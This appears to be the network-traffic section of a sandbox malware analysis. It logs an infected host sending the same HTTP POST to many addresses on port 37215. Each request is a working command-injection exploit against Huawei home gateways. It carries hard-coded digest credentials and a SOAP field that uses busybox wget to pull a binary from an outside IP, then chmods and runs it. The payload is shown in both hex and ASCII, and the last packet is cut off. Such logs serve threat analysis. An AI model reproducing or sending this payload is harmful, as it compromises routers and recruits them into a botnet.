                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1152192.168.2.155770441.26.115.2537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174789906 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1153192.168.2.154003641.238.127.11637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174865961 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1154192.168.2.154121841.169.15.15437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174916029 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1155192.168.2.154338241.67.137.21737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174978018 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1156192.168.2.154058441.228.177.14537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174978018 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1157192.168.2.155060841.148.86.14237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175003052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1158192.168.2.156059641.164.234.20637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175004959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1159192.168.2.155152041.89.199.837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175004959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1160192.168.2.155779041.67.48.19037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175030947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1161192.168.2.154374241.16.111.25437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175060034 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 